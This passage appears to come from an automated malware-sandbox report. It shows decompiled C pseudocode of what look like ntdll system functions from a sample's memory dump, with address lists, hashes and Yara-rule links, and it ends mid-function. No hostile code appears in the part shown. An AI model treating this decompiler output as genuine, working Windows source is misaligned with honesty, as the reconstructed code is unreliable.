					_push(0xffffffff);
					if(E009D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00A5A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00A5A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00A61293(_t79, _v40, E00A607DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E009B7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00A5138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                                0x00a605c5
                                                                                                                0x00a605ca
                                                                                                                0x00a605d3
                                                                                                                0x00a606db
                                                                                                                0x00a606db
                                                                                                                0x00a606dd
                                                                                                                0x00a606e3
                                                                                                                0x00a606e3
                                                                                                                0x00a605dd
                                                                                                                0x00a605e7
                                                                                                                0x00a605f6
                                                                                                                0x00a60600
                                                                                                                0x00a60607
                                                                                                                0x00a60610
                                                                                                                0x00a60615
                                                                                                                0x00a6061a
                                                                                                                0x00a6061c
                                                                                                                0x00a6061e
                                                                                                                0x00a60624
                                                                                                                0x00a60625
                                                                                                                0x00a60627
                                                                                                                0x00a60628
                                                                                                                0x00a60631
                                                                                                                0x00a60640
                                                                                                                0x00a6064d
                                                                                                                0x00a60654
                                                                                                                0x00a60654
                                                                                                                0x00a60631
                                                                                                                0x00a6066d
                                                                                                                0x00a60674
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a60692
                                                                                                                0x00a6069e
                                                                                                                0x00a606b0
                                                                                                                0x00a606a0
                                                                                                                0x00a606a9
                                                                                                                0x00a606a9
                                                                                                                0x00a606b8
                                                                                                                0x00a606d6
                                                                                                                0x00a606d6
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction ID: 4c427397507fa760c7fa9a67f5651e11d17c69516b9b84cc1e24f0520516d8bc
                                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction Fuzzy Hash: D331DF322043056BE720DF24CD85F9B7BA9ABC4754F044229BA589B2C0E6B0E954CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A13884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00A13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E009D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L009B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E009D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                0x00a13893
                                                                                                                0x00a13896
                                                                                                                0x00a13899
                                                                                                                0x00a1389f
                                                                                                                0x00a138a0
                                                                                                                0x00a138a4
                                                                                                                0x00a138a9
                                                                                                                0x00a138ac
                                                                                                                0x00a138ad
                                                                                                                0x00a138ae
                                                                                                                0x00a138af
                                                                                                                0x00a138b1
                                                                                                                0x00a138b4
                                                                                                                0x00a138bb
                                                                                                                0x00a138bc
                                                                                                                0x00a138bd
                                                                                                                0x00a138c4
                                                                                                                0x00a138c8
                                                                                                                0x00a138ca
                                                                                                                0x00a138ca
                                                                                                                0x00a138d5
                                                                                                                0x00a1393e
                                                                                                                0x00a13940
                                                                                                                0x00a13942
                                                                                                                0x00a13952
                                                                                                                0x00a13954
                                                                                                                0x00a13961
                                                                                                                0x00a13961
                                                                                                                0x00a13967
                                                                                                                0x00a1396e
                                                                                                                0x00a1396e
                                                                                                                0x00a13947
                                                                                                                0x00a1394c
                                                                                                                0x00000000
                                                                                                                0x00a1394c
                                                                                                                0x00a138ea
                                                                                                                0x00a138ee
                                                                                                                0x00a138f8
                                                                                                                0x00a138f9
                                                                                                                0x00a138ff
                                                                                                                0x00a13900
                                                                                                                0x00a13902
                                                                                                                0x00a13903
                                                                                                                0x00a1390b
                                                                                                                0x00a1390f
                                                                                                                0x00a13950
                                                                                                                0x00000000
                                                                                                                0x00a13950
                                                                                                                0x00a13915
                                                                                                                0x00a1391d
                                                                                                                0x00a1391d
                                                                                                                0x00a13922
                                                                                                                0x00a13926
                                                                                                                0x00000000
                                                                                                                0x00a13928
                                                                                                                0x00a1392b
                                                                                                                0x00a1392b
                                                                                                                0x00a13935
                                                                                                                0x00a13937
                                                                                                                0x00a13937
                                                                                                                0x00000000
                                                                                                                0x00a13935
                                                                                                                0x00a13926
                                                                                                                0x00a138f0
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 0-215506332
                                                                                                                • Opcode ID: 4335a1cdcca37e3ebd489836abe70b2d2a2b7736f53864c99ba4f6fb425f0132
                                                                                                                • Instruction ID: e79859c13e978bbf3dfe1a3f2ac1d98f2a9723455151c5cc2d290547f9e1c108
                                                                                                                • Opcode Fuzzy Hash: 4335a1cdcca37e3ebd489836abe70b2d2a2b7736f53864c99ba4f6fb425f0132
                                                                                                                • Instruction Fuzzy Hash: 3E31F173901519AFDF15DF59C955EABB774EB80B20F118169B914AB240D7709F80C7E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 33%
                                                                                                                			E009CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xa8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E009B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E009DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E009D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E009D95D0();
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                0x009cd29c
                                                                                                                0x009cd2a6
                                                                                                                0x009cd2b1
                                                                                                                0x009cd2b5
                                                                                                                0x009cd2b6
                                                                                                                0x009cd2bc
                                                                                                                0x009cd2bd
                                                                                                                0x009cd2be
                                                                                                                0x009cd2bf
                                                                                                                0x009cd2c2
                                                                                                                0x009cd2c4
                                                                                                                0x009cd2cc
                                                                                                                0x009cd384
                                                                                                                0x009cd34b
                                                                                                                0x009cd34f
                                                                                                                0x009cd350
                                                                                                                0x009cd351
                                                                                                                0x009cd35c
                                                                                                                0x009cd35c
                                                                                                                0x009cd2d6
                                                                                                                0x009cd2da
                                                                                                                0x009cd2e1
                                                                                                                0x009cd361
                                                                                                                0x009cd369
                                                                                                                0x009cd36d
                                                                                                                0x009cd2e3
                                                                                                                0x009cd2e3
                                                                                                                0x009cd2e3
                                                                                                                0x009cd2e5
                                                                                                                0x009cd2ed
                                                                                                                0x009cd2f5
                                                                                                                0x009cd2fa
                                                                                                                0x009cd302
                                                                                                                0x009cd303
                                                                                                                0x009cd30b
                                                                                                                0x009cd30f
                                                                                                                0x009cd313
                                                                                                                0x009cd318
                                                                                                                0x009cd31c
                                                                                                                0x009cd320
                                                                                                                0x009cd379
                                                                                                                0x009cd37d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a0affe
                                                                                                                0x00a0b001
                                                                                                                0x00a0b011
                                                                                                                0x00000000
                                                                                                                0x009cd322
                                                                                                                0x009cd322
                                                                                                                0x009cd330
                                                                                                                0x009cd337
                                                                                                                0x009cd35d
                                                                                                                0x009cd339
                                                                                                                0x009cd33f
                                                                                                                0x009cd38c
                                                                                                                0x009cd38c
                                                                                                                0x009cd33f
                                                                                                                0x009cd349
                                                                                                                0x00000000
                                                                                                                0x009cd349

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 4e620106c788b8d76aaba481af0c80f0d9c1c0801faf2f6be8045bd4409bd58c
                                                                                                                • Instruction ID: 3a7344b011290bde342a51a15df7191e5efe2f9ddc06ce7876293f6457da6959
                                                                                                                • Opcode Fuzzy Hash: 4e620106c788b8d76aaba481af0c80f0d9c1c0801faf2f6be8045bd4409bd58c
                                                                                                                • Instruction Fuzzy Hash: 50319EB19493859FC711DF28C981EABBBE8EBC5758F10092EF99483251D634DD04DBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009A1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E009A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E009DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E009DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E009DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L009B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                0x009a1b8f
                                                                                                                0x009a1b9a
                                                                                                                0x009a1b9c
                                                                                                                0x009a1b9e
                                                                                                                0x009a1ba3
                                                                                                                0x009f7010
                                                                                                                0x009f7010
                                                                                                                0x00000000
                                                                                                                0x009a1ba9
                                                                                                                0x009a1ba9
                                                                                                                0x009a1bae
                                                                                                                0x00000000
                                                                                                                0x009a1bc5
                                                                                                                0x009a1bca
                                                                                                                0x009a1bcf
                                                                                                                0x009a1bd0
                                                                                                                0x009a1bd1
                                                                                                                0x009a1bd2
                                                                                                                0x009a1bd6
                                                                                                                0x009a1bdc
                                                                                                                0x009a1be0
                                                                                                                0x009f6ffc
                                                                                                                0x009f7000
                                                                                                                0x00000000
                                                                                                                0x009f7006
                                                                                                                0x009f7009
                                                                                                                0x009f7009
                                                                                                                0x009a1be6
                                                                                                                0x009a1bec
                                                                                                                0x009a1c0b
                                                                                                                0x009a1c0b
                                                                                                                0x009a1c0c
                                                                                                                0x009a1c11
                                                                                                                0x009a1c12
                                                                                                                0x009a1c15
                                                                                                                0x009a1c1b
                                                                                                                0x009a1c1f
                                                                                                                0x009a1c31
                                                                                                                0x009a1c33
                                                                                                                0x009f7026
                                                                                                                0x009f7026
                                                                                                                0x009a1c21
                                                                                                                0x009a1c24
                                                                                                                0x009a1c24
                                                                                                                0x009a1bee
                                                                                                                0x009a1bee
                                                                                                                0x009a1bf2
                                                                                                                0x009a1c3a
                                                                                                                0x009a1bf4
                                                                                                                0x009a1bf4
                                                                                                                0x009a1c05
                                                                                                                0x009a1c05
                                                                                                                0x009a1c09
                                                                                                                0x009a1c3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009a1c09
                                                                                                                0x009a1bec
                                                                                                                0x009a1be0
                                                                                                                0x009a1bae
                                                                                                                0x009a1c2e

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                • API String ID: 0-3583428290
                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction ID: 202bd547f67924ca552994ba3d78b0257ee8a0f3ba4eb72dd9aa023709de6a03
                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction Fuzzy Hash: 8621AA76541228ABDB219A95C940F6BF77DEF92760F1A4426FD449B200DA34DD00D7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E009BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                0x009bf71d
                                                                                                                0x009bf722
                                                                                                                0x009bf726
                                                                                                                0x00a04770
                                                                                                                0x009bf765
                                                                                                                0x009bf769
                                                                                                                0x009bf769
                                                                                                                0x009bf732
                                                                                                                0x00a0477a
                                                                                                                0x00000000
                                                                                                                0x00a0477a
                                                                                                                0x009bf738
                                                                                                                0x009bf73a
                                                                                                                0x009bf73c
                                                                                                                0x009bf73f
                                                                                                                0x009bf746
                                                                                                                0x009bf778
                                                                                                                0x009bf7a9
                                                                                                                0x009bf7a9
                                                                                                                0x009bf754
                                                                                                                0x009bf75a
                                                                                                                0x009bf75d
                                                                                                                0x009bf75f
                                                                                                                0x009bf761
                                                                                                                0x009bf76f
                                                                                                                0x009bf771
                                                                                                                0x009bf771
                                                                                                                0x009bf76f
                                                                                                                0x009bf763
                                                                                                                0x00000000
                                                                                                                0x009bf763
                                                                                                                0x009bf77d
                                                                                                                0x009bf7a3
                                                                                                                0x009bf7a5
                                                                                                                0x00000000
                                                                                                                0x009bf7a5
                                                                                                                0x009bf77f
                                                                                                                0x009bf782
                                                                                                                0x009bf784
                                                                                                                0x009bf786
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009bf788
                                                                                                                0x009bf748
                                                                                                                0x009bf74d
                                                                                                                0x009bf78d
                                                                                                                0x009bf793
                                                                                                                0x009bf7b7
                                                                                                                0x009bf7bc
                                                                                                                0x00000000
                                                                                                                0x009bf7bc
                                                                                                                0x009bf798
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009bf79d
                                                                                                                0x009bf7b0
                                                                                                                0x00000000
                                                                                                                0x009bf7b0
                                                                                                                0x009bf79f
                                                                                                                0x00000000
                                                                                                                0x009bf74f
                                                                                                                0x009bf74f
                                                                                                                0x00000000
                                                                                                                0x009bf74f

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Actx
                                                                                                                • API String ID: 0-89312691
                                                                                                                • Opcode ID: 7ee5d67ea890c5e7a93c419c68887f663b9b6cad6d579181b768b7478191d2b9
                                                                                                                • Instruction ID: 27587c14a5b393f401b3ddb80d20a3cfc5a68452bc6a029cbeeabf3b65d3b68c
                                                                                                                • Opcode Fuzzy Hash: 7ee5d67ea890c5e7a93c419c68887f663b9b6cad6d579181b768b7478191d2b9
                                                                                                                • Instruction Fuzzy Hash: 18118E35304A029BEB244E1D8EF06B67299EB96734F3549BAE865CB391DF78CC408380
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A48DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00A48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xa70d50);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00A25720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L009EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L009EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E009ED130(_t34, _t39, _t40);
			}





                                                                                                                0x00a48df1
                                                                                                                0x00a48df1
                                                                                                                0x00a48df1
                                                                                                                0x00a48df1
                                                                                                                0x00a48df1
                                                                                                                0x00a48df1
                                                                                                                0x00a48df3
                                                                                                                0x00a48df8
                                                                                                                0x00a48dfd
                                                                                                                0x00a48e00
                                                                                                                0x00a48e0e
                                                                                                                0x00a48e2a
                                                                                                                0x00a48e36
                                                                                                                0x00a48e38
                                                                                                                0x00a48e3c
                                                                                                                0x00a48e46
                                                                                                                0x00a48e46
                                                                                                                0x00a48e36
                                                                                                                0x00a48e50
                                                                                                                0x00a48e56
                                                                                                                0x00a48e59
                                                                                                                0x00a48e5c
                                                                                                                0x00a48e60
                                                                                                                0x00a48e67
                                                                                                                0x00a48e6d
                                                                                                                0x00a48e73
                                                                                                                0x00a48e74
                                                                                                                0x00a48eb1
                                                                                                                0x00a48ebd

                                                                                                                Strings
                                                                                                                • Critical error detected %lx, xrefs: 00A48E21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Critical error detected %lx
                                                                                                                • API String ID: 0-802127002
                                                                                                                • Opcode ID: 9a2c0ac129b52aa0fb117ca3efe61f5ae12e639b4a43cc75ca74cc1006555eee
                                                                                                                • Instruction ID: 7086c6ec57c020577e2e1cb2aedc281f6a8b3b690dad0cd3afb9118380e9eeba
                                                                                                                • Opcode Fuzzy Hash: 9a2c0ac129b52aa0fb117ca3efe61f5ae12e639b4a43cc75ca74cc1006555eee
                                                                                                                • Instruction Fuzzy Hash: 38118B75D05348EBDF25DFA995067ACBBB0BB44714F30422DE428AB282C7388A01CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A2FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00A2FF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                • API String ID: 0-1911121157
                                                                                                                • Opcode ID: 6dd298c6470174536d04f0e7615b74298e45f5ce7732caf521867e056d8b57fd
                                                                                                                • Instruction ID: cce922ad3290e369c48c5f6d091a07db9746c50f3e64651f27feedcc91b82c3f
                                                                                                                • Opcode Fuzzy Hash: 6dd298c6470174536d04f0e7615b74298e45f5ce7732caf521867e056d8b57fd
                                                                                                                • Instruction Fuzzy Hash: D811C071950594EFDB16EB54CE49F98BBB2FF48704F148474F509AB2A2C7399D40CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A65BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00A65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xa71178);
				E009ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
